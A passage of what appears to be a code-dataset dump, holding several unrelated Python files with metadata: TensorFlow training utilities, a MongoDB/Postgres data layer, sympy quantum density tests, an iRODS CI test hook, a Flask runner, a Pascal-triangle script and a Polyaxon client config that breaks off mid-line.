logit_to_label(logits):\n '''\n Args:\n logits is the tensor with shape\n [batch, shape(e.g. height*width or count), channels] or [batch, channels],\n channel indices is 0,1,2,3,4,5,...,num_classes-1\n respected to label value,\n in one point(e.g. x,y) channel[the label mask value(channel indices)]\n has the max value;\n Return:\n labels is the mask with value 0,1,2,3,4,5,...,num_classes-1\n and with shape [batch, shape(e.g. height*width or count)] or [batch];\n '''\n labels = tf.argmax(logits, axis=tf.size(tf.shape(logits))-1)\n labels = tf.cast(labels, tf.int32)\n return labels\n \ndef label_to_logit(labels, num_classes, on_value=1.0, off_value=0.0):\n '''\n Args:\n labels is the mask with value 0,1,2,3,4,5,...,num_classes-1\n and with shape [batch, shape(e.g. height*width or count)] or [batch];\n num_classes is the total number \n with backgound class + original classes;\n Return:\n logits is the tensor with shape \n [batch, shape(e.g. height*width or count), channels],\n channel indices is 0,1,2,3,4,5,...,num_classes-1\n respected to label value,\n in one point(e.g. x,y) channel[the label mask value(channel indices)]==1 else ==0;\n '''\n logits = slim.one_hot_encoding(\n tf.cast(labels, dtype=tf.int32), \n num_classes, on_value=on_value, off_value=off_value)\n return logits\n\ndef add_softmax_cross_entropy_loss(logits,\n labels,\n class_id_list,\n scope=None):\n \"\"\"Adds softmax cross entropy loss for logits of each scale.\n \n Args:\n logits: The logits have shape [batch, shape, num_classes].\n labels: Groundtruth labels with shape [batch, shape, 1] or [batch, shape].\n class_id_list: Class id list.\n scope: String, the scope for the loss.\n \n Raises:\n ValueError: Label or logits is None.\n \"\"\"\n if logits is None:\n raise ValueError('No logit for softmax cross entropy loss.')\n if labels is None:\n raise ValueError('No label for softmax cross entropy loss.')\n if class_id_list is None:\n raise ValueError('No class id list for softmax cross entropy loss.')\n if len(class_id_list) == 0:\n raise ValueError('Class id list is empty for softmax cross entropy loss.')\n\n weights = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n weights = weights | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights)\n \n num_classes = len(class_id_list)\n label_logits = label_to_logit(labels, num_classes)\n label_logits = tf.reshape(label_logits, shape=[-1, num_classes])\n logits = tf.reshape(logits, shape=[-1, num_classes])\n weights = tf.reshape(weights, shape=[-1])\n loss = tf.losses.softmax_cross_entropy(\n label_logits, logits,\n weights=weights,\n scope=scope)\n return loss\n\ndef add_sigmoid_cross_entropy_loss(logits,\n labels,\n class_id_list,\n scope=None):\n \"\"\"Adds sigmoid cross entropy loss for logits of each scale.\n \n Args:\n logits: The logits have shape [batch, shape, num_classes].\n labels: Groundtruth labels with shape [batch, shape, 1] or [batch, shape].\n class_id_list: Class id list.\n scope: String, the scope for the loss.\n \n Raises:\n ValueError: Label or logits is None.\n \"\"\"\n if logits is None:\n raise ValueError('No logit for softmax cross entropy loss.')\n if labels is None:\n raise ValueError('No label for softmax cross entropy loss.')\n if class_id_list is None:\n raise ValueError('No class id list for softmax cross entropy loss.')\n if len(class_id_list) == 0:\n raise ValueError('Class id list is empty for softmax cross entropy loss.')\n\n weights = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n weights = weights | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights)\n \n num_classes = len(class_id_list)\n label_logits = label_to_logit(labels, num_classes)\n label_logits = tf.reshape(label_logits, shape=[-1, num_classes])\n logits = tf.reshape(logits, shape=[-1, num_classes])\n weights = tf.reshape(weights, shape=[-1])\n loss = tf.losses.sigmoid_cross_entropy(\n label_logits, logits,\n weights=1.0,\n scope=scope)\n return loss\n\ndef get_model_learning_rate(\n learning_policy, base_learning_rate, learning_rate_decay_step,\n learning_rate_decay_factor, training_number_of_steps, learning_power,\n slow_start_step, slow_start_learning_rate, end_learning_rate=0.0):\n \"\"\"Gets model's learning rate.\n\n Computes the model's learning rate for different learning policy.\n Right now, only \"step\" and \"poly\" are supported.\n (1) The learning policy for \"step\" is computed as follows:\n current_learning_rate = base_learning_rate *\n learning_rate_decay_factor ^ (global_step / learning_rate_decay_step)\n See tf.train.exponential_decay for details.\n (2) The learning policy for \"poly\" is computed as follows:\n current_learning_rate = base_learning_rate *\n (1 - global_step / training_number_of_steps) ^ learning_power\n\n Args:\n learning_policy: Learning rate policy for training.\n base_learning_rate: The base learning rate for model training.\n learning_rate_decay_step: Decay the base learning rate at a fixed step.\n learning_rate_decay_factor: The rate to decay the base learning rate.\n training_number_of_steps: Number of steps for training.\n learning_power: Power used for 'poly' learning policy.\n slow_start_step: Training model with small learning rate for the first\n few steps.\n slow_start_learning_rate: The learning rate employed during slow start.\n\n Returns:\n Learning rate for the specified learning policy.\n\n Raises:\n ValueError: If learning policy is not recognized.\n \"\"\"\n global_step = tf.train.get_or_create_global_step()\n if learning_policy == 'step':\n learning_rate = tf.train.exponential_decay(\n learning_rate=base_learning_rate,\n global_step=global_step,\n decay_steps=learning_rate_decay_step,\n decay_rate=learning_rate_decay_factor,\n staircase=True,\n name='step_decay_learning_rate')\n learning_rate = tf.where(learning_rate < end_learning_rate, end_learning_rate,\n learning_rate)\n elif learning_policy == 'poly':\n learning_rate = tf.train.polynomial_decay(\n learning_rate=base_learning_rate,\n global_step=global_step,\n decay_steps=training_number_of_steps,\n end_learning_rate=end_learning_rate,\n power=learning_power,\n cycle=False,\n name='polynomial_decay_learning_rate')\n elif learning_policy == 'fixed':\n learning_rate = tf.constant(base_learning_rate, name='fixed_learning_rate')\n else:\n raise ValueError('Unknown learning policy.')\n\n # Employ small learning rate at the first few steps for warm start.\n warm_up_learning_rate = tf.add(slow_start_learning_rate,\n (base_learning_rate-slow_start_learning_rate)/slow_start_step*tf.cast(global_step,tf.float32),\n name='warm_up_learning_rate')\n return tf.where(global_step < slow_start_step, warm_up_learning_rate,\n learning_rate)\n\ndef get_model_init_fn(train_logdir,\n tf_initial_checkpoint,\n initialize_last_layer=True,\n last_layers=None,\n ignore_missing_vars=False):\n \"\"\"Gets the function initializing model variables from a checkpoint.\n\n Args:\n train_logdir: Log directory for training.\n tf_initial_checkpoint: TensorFlow checkpoint for initialization.\n initialize_last_layer: Initialize last layer or not.\n last_layers: Last layers of the model.\n ignore_missing_vars: Ignore missing variables in the checkpoint.\n\n Returns:\n Initialization function.\n \"\"\"\n if tf_initial_checkpoint is None:\n tf.logging.info('Not initializing the model from a checkpoint.')\n return None\n\n if tf.train.latest_checkpoint(train_logdir):\n tf.logging.info('Ignoring initialization; other checkpoint exists')\n return None\n\n tf.logging.info('Initializing model from path: %s', tf_initial_checkpoint)\n\n # Variables that will not be restored.\n exclude_list = ['global_step']\n if (not initialize_last_layer) and (last_layers is not None):\n exclude_list.extend(last_layers)\n\n variables_to_restore = slim.get_variables_to_restore(exclude=exclude_list)\n\n if variables_to_restore:\n return slim.assign_from_checkpoint_fn(\n tf_initial_checkpoint,\n variables_to_restore,\n ignore_missing_vars=ignore_missing_vars)\n return None\n\ndef save_model(sess, save_dir, ckpt_name='model.ckpt', save_step=None):\n path = os.path.join(save_dir, ckpt_name)\n saver = tf.train.Saver()\n save_path = saver.save(sess, path, global_step=save_step)\n return save_path\n\ndef restore_model(sess, restore_dir, ckpt_name='model.ckpt'):\n path = os.path.join(restore_dir, ckpt_name+'.meta')\n saver = tf.train.import_meta_graph(path)\n saver.restore(sess, tf.train.latest_checkpoint(restore_dir))\n \ndef copytensor(tensor):\n return tf.add(tensor, tf.zeros_like(tensor))\n\ndef summariyFeaturemapByName(tenor_name, summary_name, max_outputs=None):\n '''Tensor shape must be [batch_size, height, width, channels],\n only summary first feature map in a batch.'''\n featuremap = tf.get_default_graph().get_tensor_by_name(tenor_name)\n channels = featuremap.get_shape().as_list()[3]\n features = []\n for i in range(channels):\n feature = tf.expand_dims(featuremap[0, :, :, i], axis=2)\n features.append(feature)\n featuremap_summary = tf.stack(features, axis=0)\n tf.summary.image(\n summary_name, featuremap_summary, \n max_outputs=channels if max_outputs is None else max_outputs)\n\ndef get_label_weights(labels, class_id_list):\n '''Labels in class_id_list respect to weight 1.0, \n else will respect to weight 0.0.\n return weights have the same shape of labels.\n '''\n num_classes = len(class_id_list)\n weights_mask = tf.equal(labels, class_id_list[0])\n for i in range(1, num_classes):\n weights_mask = weights_mask | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights_mask)\n return weights\n\ndef filter_labels(labels, class_id_list):\n '''Labels in class_id_list will be reserved, else will be set to 0,\n with data type int32. So label 0(class id) should be background.\n '''\n labels = tf.cast(labels, dtype=tf.int32)\n mask = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n mask = mask | tf.equal(labels, class_id_list[i])\n labels_filtered = tf.where(mask, labels, tf.zeros_like(labels, dtype=tf.int32))\n return labels_filtered\n\ndef build_tensor_map(key_list_tensor, value_list_tensor, default_value):\n return tf.contrib.lookup.HashTable(\n tf.contrib.lookup.KeyValueTensorInitializer(\n keys=key_list_tensor,\n values=value_list_tensor),\n default_value=default_value)\n\n\ndef mapping_tensor(input_key_tensor, tensor_map):\n '''\n e.g. input_key_tensor=tensor([b'person', b'aeroplane', b'']),\n then output_value_tensor=tensor([15, 1, -1]).\n '''\n # tensor_map.init.run()\n output_value_tensor = tensor_map.lookup(input_key_tensor)\n return output_value_tensor","sub_path":"projects/deepin/src/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":13033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"513947686","text":"from Midas.configs import (\n mongo_connection_info,\n default_db,\n raw_data_collection,\n sessions_collection,\n models_collection,\n postgres_connection_info as pg,\n)\nfrom hashlib import md5\nimport time\nimport pickle\nfrom pymongo import MongoClient, ReturnDocument\nimport pandas as pd\nfrom bson import ObjectId\nfrom sqlalchemy import create_engine\n\n\ndef mongo_to_df(db, collection, query={}, no_id=True):\n \"\"\" Read from Mongo and Store into DataFrame \"\"\"\n mongo_conn = MongoClient(**mongo_connection_info)\n # Make a query to the specific DB and Collection\n database = mongo_conn[db]\n cursor = database[collection].find(query)[\"data\"]\n\n # Expand the cursor and construct the DataFrame\n df = pd.DataFrame(list(cursor))\n\n # Delete the _id\n if no_id:\n del df[\"_id\"]\n\n return df\n\n\ndef get_headers(collection, db=default_db):\n return mongo_to_df(db, collection).tolist()\n\n\ndef load_df_to_postgres(df, table, **kwargs):\n engine = create_engine(\n f\"postgresql://{pg['user']}@{pg['host']}:{pg['port']}/{pg['database']}\"\n )\n df.to_sql(table, engine, **kwargs)\n\n\ndef postgres_to_df(query, **kwargs):\n engine = create_engine(\n f\"postgresql://{pg['user']}@{pg['host']}:{pg['port']}/{pg['database']}\"\n )\n return pd.read_sql(query, engine, **kwargs)\n\n\ndef upload_raw_data(session_id, raw_data):\n mi_raw_data = MongoInterface(default_db, raw_data_collection)\n\n raw_data_id = mi_raw_data.insert_records({\"data\": raw_data})\n\n update_session_data(session_id, dict(raw_data_ids=raw_data_id))\n return str(raw_data_id)\n\n\ndef update_session_data(session_id, push_dict):\n mi = MongoInterface(default_db, sessions_collection)\n return mi.update_records({\"_id\": ObjectId(session_id)}, {\"$push\": push_dict})\n\n\ndef create_new_session(session_obj):\n # session_obj here is a dict\n mi = MongoInterface(default_db, sessions_collection)\n return mi.insert_records(session_obj)\n\n\ndef get_session_data(session_id):\n mi = MongoInterface(default_db, sessions_collection)\n return mi.retrieve_records({\"_id\": ObjectId(session_id)})\n\n\ndef get_models_from_session(session_id):\n model_ids = get_session_data(session_id)[\"model_ids\"]\n mi = MongoInterface(default_db, models_collection)\n\n model_filter = []\n for model in model_ids:\n model_filter.append({\"_id\": ObjectId(model)})\n\n return mi.retrieve_records(model_filter)\n\n\ndef get_model(model_id):\n mi = MongoInterface(default_db, models_collection)\n return mi.retrieve_records({\"_id\": ObjectId(model_id)})\n\n\ndef save_model(model):\n mi = MongoInterface(default_db, models_collection)\n\n model_id = mi.insert_records(\n {\n \"pickled_model\": model,\n }\n )\n return model_id\n\n\ndef update_model(model_id, update_values, operation=\"set\"):\n mi = MongoInterface(default_db, models_collection)\n mi.update_records({\"_id\": ObjectId(model_id)}, {f\"${operation}\": update_values})\n\n\ndef delete_model(model_id):\n mi = MongoInterface(default_db, models_collection)\n mi.delete_records({\"_id\": ObjectId(model_id)})\n\n\ndef delete_session(session_id):\n\n print(f\"session_id: {session_id}\")\n mis = MongoInterface(default_db, sessions_collection)\n # we should be getting 1 session because objectids are unique\n session = mis.retrieve_records({\"_id\": ObjectId(session_id)})[0]\n count = mis.delete_records({\"_id\": ObjectId(session_id)})\n # delete associated model\n print(count)\n delete_model(session[\"model_id\"])\n \n\n\ndef get_raw_data(session_id):\n raw_data_ids = get_session_data(session_id)[\"raw_data_ids\"]\n mi = MongoInterface(default_db, raw_data_collection)\n\n raw_data_filter = []\n\n for _id in raw_data_ids:\n raw_data_filter.append({\"_id\": ObjectId(_id)})\n\n return mi.retrieve_records(raw_data_filter)\n\n\ndef raw_data_to_df(raw_data_id):\n mi = MongoInterface(default_db, raw_data_collection)\n data = mi.retrieve_records({\"_id\": ObjectId(raw_data_id)})[\"data\"]\n df = pd.read_json(data, orient=\"records\")\n\n return df\n\n\ndef get_all_sessions():\n mis = MongoInterface(default_db, sessions_collection)\n all_sessions = mis.retrieve_records({})\n print(all_sessions)\n model_data = []\n for session in all_sessions:\n # print(\"session: %s\" % str(session[\"_id\"]))\n model_data.append(\n {\n \"session_id\": session[\"_id\"],\n \"ml_algorithm\": session[\"ml_algorithm\"],\n \"pretty_name\": session[\"pretty_name\"],\n }\n )\n\n print(model_data)\n return model_data\n\n\nclass MongoInterface:\n def __init__(self, db, collection):\n mongo_conn = MongoClient(**mongo_connection_info)\n database = mongo_conn[db]\n self.interface = database[collection]\n\n def insert_records(self, records):\n \"\"\"\n simple method to insert one or many records\n \"\"\"\n # short circuit for situation where we provided a single dict\n\n if type(records) == dict:\n result = self.interface.insert_one(records)\n return result.inserted_id\n elif type(records) == list and len(records) == 1:\n result = self.interface.insert_one(records[0])\n return result.inserted_id\n else:\n result = self.interface.insert_many(records)\n return result.inserted_ids\n\n def retrieve_records(self, _filter):\n \"\"\"\n simple method to retrieve mongo records\n returns updated records (dicts)\n \"\"\"\n return self.interface.find(_filter)\n\n def update_records(self, _filter, update_values):\n \"\"\"\n simple method to update mongo records\n \"\"\"\n if type(_filter) == dict:\n return self.interface.find_one_and_update(\n _filter,\n update_values,\n upsert=True,\n return_document=ReturnDocument.AFTER,\n )\n elif type(_filter) == list and len(_filter) == 1:\n return self.interface.find_one_and_update(\n _filter[0],\n update_values[0],\n upsert=True,\n return_document=ReturnDocument.AFTER,\n )\n else:\n self.interface.update_many(_filter, update_values, upsert=True)\n return self.interface.find(_filter)\n\n def delete_records(self, _filter):\n if type(_filter) == dict:\n result = self.interface.delete_one(_filter)\n elif type(_filter) == list and len(_filter) == 1:\n result = self.interface.delete_one(_filter[0])\n else:\n result = self.interface.delete_many(_filter)\n return result.deleted_count\n","sub_path":"Midas/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26626442","text":"from sympy import pprint, latex, symbols\nfrom sympy.physics.quantum.density import Density\nfrom sympy.physics.quantum.state import Ket, Bra\nfrom sympy.physics.quantum.qubit import Qubit\nfrom sympy.physics.quantum.qapply import qapply\nfrom sympy.physics.quantum.gate import HadamardGate\nfrom sympy.physics.quantum.represent import represent\nfrom sympy.physics.quantum.dagger import Dagger\nfrom sympy.physics.quantum.cartesian import XKet, PxKet, PxOp, XOp\nfrom sympy.functions import sqrt\nfrom sympy.utilities.pytest import raises\n\ndef test_eval_args():\n # check instance created\n assert isinstance(Density([Ket(0), 0.5], [Ket(1), 0.5]), Density)\n\n # check for value error, when prob is not provided\n raises(ValueError, 'Density([Ket(0)], [Ket(1)])')\n\ndef test_doit():\n x,y = symbols('x y')\n d = Density([XKet(),0.5], [PxKet(),0.5])\n assert (0.5*(PxKet()*Dagger(PxKet())) +\n 0.5*(XKet()*Dagger(XKet()))) == d.doit()\n\n # check for kets with expr in them\n d_with_sym = Density([XKet(x*y),0.5], [PxKet(x*y),0.5])\n assert (0.5*(PxKet(x*y)*Dagger(PxKet(x*y))) +\n 0.5*(XKet(x*y)*Dagger(XKet(x*y)))) == d_with_sym.doit()\n\ndef test_apply_op():\n d = Density([Ket(0), 0.5], [Ket(1), 0.5])\n assert d.apply_op(XOp()) == Density([XOp()*Ket(0), 0.5],\n [XOp()*Ket(1), 0.5])\n\ndef test_represent():\n x,y = symbols('x y')\n d = Density([XKet(),0.5], [PxKet(),0.5])\n assert (represent(0.5*(PxKet()*Dagger(PxKet()))) +\n represent(0.5*(XKet()*Dagger(XKet())))) == represent(d)\n\n # check for kets with expr in them\n d_with_sym = Density([XKet(x*y),0.5], [PxKet(x*y),0.5])\n assert (represent(0.5*(PxKet(x*y)*Dagger(PxKet(x*y)))) +\n represent(0.5*(XKet(x*y)*Dagger(XKet(x*y))))) == \\\n represent(d_with_sym)\n\n # check when given explicit basis\n assert (represent(0.5*(XKet()*Dagger(XKet())), basis=PxOp()) +\n represent(0.5*(PxKet()*Dagger(PxKet())), basis=PxOp())) == \\\n represent(d, basis=PxOp())\n\ndef test_states():\n d = Density([Ket(0), 0.5], [Ket(1), 0.5])\n states = d.states()\n assert states[0] == Ket(0) and states[1] == Ket(1)\n\ndef test_probs():\n d = Density([Ket(0), .75], [Ket(1), 0.25])\n probs = d.probs()\n assert probs[0] == 0.75 and probs[1] == 0.25\n\n #probs can be symbols\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n probs = d.probs()\n assert probs[0] == x and probs[1] == y\n\ndef test_get_state():\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n states = (d.get_state(0), d.get_state(1))\n assert states[0] == Ket(0) and states[1] == Ket(1)\n\ndef test_get_prob():\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n probs = (d.get_prob(0), d.get_prob(1))\n assert probs[0] == x and probs[1] == y\n","sub_path":"sympy/physics/quantum/tests/test_density.py","file_name":"test_density.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"376202757","text":"from __future__ import print_function\n\nimport argparse\nimport os\nimport shutil\nimport glob\nimport time\nimport irods_python_ci_utilities\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_root_directory', type=str, required=True)\n parser.add_argument('--built_packages_root_directory', type=str, required=True)\n parser.add_argument('--munge_path', type=str, default=None, help='munge externals path')\n parser.add_argument('--test_unified_storage_tiering', type=str, default=None, help='should be either True or False')\n\n args = parser.parse_args()\n\n output_root_directory = args.output_root_directory\n built_packages_root_directory = args.built_packages_root_directory\n package_suffix = irods_python_ci_utilities.get_package_suffix()\n os_specific_directory = irods_python_ci_utilities.append_os_specific_directory(built_packages_root_directory)\n irods_python_ci_utilities.subprocess_get_output(['sudo', '-EH', 'pip', 'install', 'unittest-xml-reporting==1.14.0'])\n irods_python_ci_utilities.install_os_packages_from_files(glob.glob(os.path.join(os_specific_directory, 'irods-rule-engine-plugin-unified-storage-tiering*')))\n \n test_name = 'test_plugin_unified_storage_tiering'\n\n time.sleep(10)\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'chmod', 'g+rwx', '/dev/fuse'], check_rc=True)\n\n time.sleep(10)\n\n try:\n test_output_file = '/var/lib/irods/log/test_output.log'\n\n if args.munge_path is not None or args.munge_path != '':\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'cd scripts; {0}; python2 run_tests.py --xml_output --run_s {1} 2>&1 | tee {2}; exit $PIPESTATUS'.format(args.munge_path, test_name, test_output_file)], check_rc=True)\n else:\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'python2 scripts/run_tests.py --xml_output --run_s {0} 2>&1 | tee {1}; exit $PIPESTATUS'.format(test_name, test_output_file)], check_rc=True)\n finally:\n if output_root_directory:\n irods_python_ci_utilities.gather_files_satisfying_predicate('/var/lib/irods/log', output_root_directory, lambda x: True)\n shutil.copy('/var/lib/irods/log/test_output.log', output_root_directory)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"irods_consortium_continuous_integration_test_hook.py","file_name":"irods_consortium_continuous_integration_test_hook.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293971625","text":"import os\nfrom app import app\nfrom flask import redirect\nfrom app.routes.routes import stocks_blueprint\n\napp.register_blueprint(stocks_blueprint, url_prefix='/stocks')\n\n@app.route('/')\ndef base():\n return redirect(\"/stocks/table\", code=302)\n\nproduction = os.environ.get(\"PRODUCTION\", False)\n\nif __name__ == '__main__':\n if production:\n app.run()\n else:\n app.run(host='127.0.0.1', port=8000, debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"383235104","text":"import time\nstart = time.time()\n\ndef pascal(rows):\n l = [[1]]\n for r in range(1,rows + 1):\n half = len(l)\n if half % 2 != 0:\n half -= 1\n half = int(half/2)\n #print (half)\n zipped = zip([0]+l[-1],l[-1]+[0])\n mapped = map(sum,zipped)\n l.append(list(mapped))\n #print (':',r)\n print (l[-1][half])\n\n #print (l)\npascal(40)\n\n\ntotalTime = (time.time() - start)\nprint ('Total time:', totalTime ,'second')\n","sub_path":"015LatticePaths.py","file_name":"015LatticePaths.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"193195691","text":"#!/usr/bin/python\n#\n# Copyright 2018-2021 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport polyaxon_sdk\n\nfrom marshmallow import EXCLUDE, fields\n\nfrom polyaxon.api import get_default_host\nfrom polyaxon.containers.contexts import CONTEXT_ARCHIVE_ROOT\nfrom polyaxon.env_vars.keys import (\n POLYAXON_KEYS_API_VERSION,\n POLYAXON_KEYS_ARCHIVE_ROOT,\n POLYAXON_KEYS_ASSERT_HOSTNAME,\n POLYAXON_KEYS_AUTHENTICATION_TYPE,\n POLYAXON_KEYS_CERT_FILE,\n POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE,\n POLYAXON_KEYS_DEBUG,\n POLYAXON_KEYS_DISABLE_ERRORS_REPORTING,\n POLYAXON_KEYS_HEADER,\n POLYAXON_KEYS_HEADER_SERVICE,\n POLYAXON_KEYS_HOST,\n POLYAXON_KEYS_INTERVAL,\n POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK,\n POLYAXON_KEYS_IS_MANAGED,\n POLYAXON_KEYS_IS_OFFLINE,\n POLYAXON_KEYS_IS_OPS,\n POLYAXON_KEYS_K8S_IN_CLUSTER,\n POLYAXON_KEYS_K8S_NAMESPACE,\n POLYAXON_KEYS_KEY_FILE,\n POLYAXON_KEYS_LOG_LEVEL,\n POLYAXON_KEYS_NO_API,\n POLYAXON_KEYS_NO_OP,\n POLYAXON_KEYS_SERVICE,\n POLYAXON_KEYS_SSL_CA_CERT,\n POLYAXON_KEYS_TIME_ZONE,\n POLYAXON_KEYS_TIMEOUT,\n POLYAXON_KEYS_TRACKING_TIMEOUT,\n POLYAXON_KEYS_VERIFY_SSL,\n POLYAXON_KEYS_WATCH_INTERVAL,\n)\nfrom polyaxon.exceptions import PolyaxonClientException\nfrom polyaxon.pkg import VERSION\nfrom polyaxon.schemas.base import BaseConfig, BaseSchema\nfrom polyaxon.services.auth import AuthenticationTypes\nfrom polyaxon.services.headers import PolyaxonServiceHeaders, PolyaxonServices\nfrom polyaxon.utils.http_utils import clean_host, clean_verify_ssl\n\n\nclass ClientSchema(BaseSchema):\n service = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_SERVICE)\n host = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_HOST)\n version = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_API_VERSION)\n debug = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_DEBUG)\n log_level = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_LOG_LEVEL)\n authentication_type = fields.Str(\n allow_none=True, data_key=POLYAXON_KEYS_AUTHENTICATION_TYPE\n )\n is_managed = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_MANAGED)\n is_offline = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_OFFLINE)\n is_ops = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_OPS)\n in_cluster = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_K8S_IN_CLUSTER)\n no_op = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_NO_OP)\n timeout = fields.Float(allow_none=True, data_key=POLYAXON_KEYS_TIMEOUT)\n tracking_timeout = fields.Float(\n allow_none=True, data_key=POLYAXON_KEYS_TRACKING_TIMEOUT\n )\n timezone = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_TIME_ZONE)\n watch_interval = fields.Int(allow_none=True, data_key=POLYAXON_KEYS_WATCH_INTERVAL)\n interval = fields.Float(allow_none=True, data_key=POLYAXON_KEYS_INTERVAL)\n verify_ssl = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_VERIFY_SSL)\n ssl_ca_cert = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_SSL_CA_CERT)\n cert_file = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_CERT_FILE)\n key_file = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_KEY_FILE)\n assert_hostname = fields.Bool(\n allow_none=True, data_key=POLYAXON_KEYS_ASSERT_HOSTNAME\n )\n connection_pool_maxsize = fields.Int(\n allow_none=True, data_key=POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE\n )\n archive_root = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_ARCHIVE_ROOT)\n\n header = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_HEADER)\n header_service = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_HEADER_SERVICE)\n\n namespace = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_K8S_NAMESPACE)\n no_api = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_NO_API)\n disable_errors_reporting = fields.Bool(\n allow_none=True, data_key=POLYAXON_KEYS_DISABLE_ERRORS_REPORTING\n )\n compatibility_check_interval = fields.Int(\n allow_none=True, data_key=POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK\n )\n\n @staticmethod\n def schema_config():\n return ClientConfig\n\n\nclass ClientConfig(BaseConfig):\n SCHEMA = ClientSchema\n IDENTIFIER = \"global\"\n\n PAGE_SIZE = 20\n BASE_URL = \"{}/api/{}\"\n\n UNKNOWN_BEHAVIOUR = EXCLUDE\n\n REDUCED_ATTRIBUTES = [\n POLYAXON_KEYS_SERVICE,\n POLYAXON_KEYS_HOST,\n POLYAXON_KEYS_API_VERSION,\n POLYAXON_KEYS_ASSERT_HOSTNAME,\n POLYAXON_KEYS_AUTHENTICATION_TYPE,\n POLYAXON_KEYS_CERT_FILE,\n POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE,\n POLYAXON_KEYS_ARCHIVE_ROOT,\n POLYAXON_KEYS_DEBUG,\n POLYAXON_KEYS_HEADER,\n POLYAXON_KEYS_HEADER_SERVICE,\n POLYAXON_KEYS_K8S_IN_CLUSTER,\n POLYAXON_KEYS_INTERVAL,\n POLYAXON_KEYS_IS_MANAGED,\n POLYAXON_KEYS_IS_OFFLINE,\n POLYAXON_KEYS_IS_OPS,\n POLYAXON_KEYS_K8S_NAMESPACE,\n POLYAXON_KEYS_KEY_FILE,\n POLYAXON_KEYS_LOG_LEVEL,\n POLYAXON_KEYS_NO_API,\n POLYAXON_KEYS_NO_OP,\n POLYAXON_KEYS_SSL_CA_CERT,\n POLYAXON_KEYS_TIMEOUT,\n POLYAXON_KEYS_TRACKING_TIMEOUT,\n POLYAXON_KEYS_VERIFY_SSL,\n POLYAXON_KEYS_WATCH_INTERVAL,\n POLYAXON_KEYS_DISABLE_ERRORS_REPORTING,\n POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK,\n ]\n\n def __init__(\n self,\n service=None,\n host=None,\n token=None,\n debug=None,\n log_level=None,\n version=None,\n authentication_type=None,\n is_managed=None,\n is_offline=None,\n is_ops=None,\n in_cluster=None,\n no_op=None,\n timeout=None,\n tracking_timeout=None,\n timezone=None,\n watch_interval=None,\n interval=None,\n verify_ssl=None,\n ssl_ca_cert=None,\n cert_file=None,\n key_file=None,\n assert_hostname=None,\n connection_pool_maxsize=None,\n archive_root=None,\n header=None,\n header_service=None,\n namespace=None,\n no_api=None,\n disable_errors_reporting=None,\n compatibility_check_interval=None,\n **kwargs\n ):\n self.service = service\n self.host = clean_host(get_default_host(host, service))\n self.token = token\n self.debug = self._get_bool(debug, False)\n self.log_level = log_level\n self.version = version or \"v1\"\n self.is_managed = self._get_bool(is_managed, False)\n self.is_offline = self._get_bool(is_offline, False)\n self.is_ops = self._get_bool(is_ops, False)\n self.in_cluster = self._get_bool(in_cluster, False)\n self.no_op = self._get_bool(no_op, False)\n self.verify_ssl = 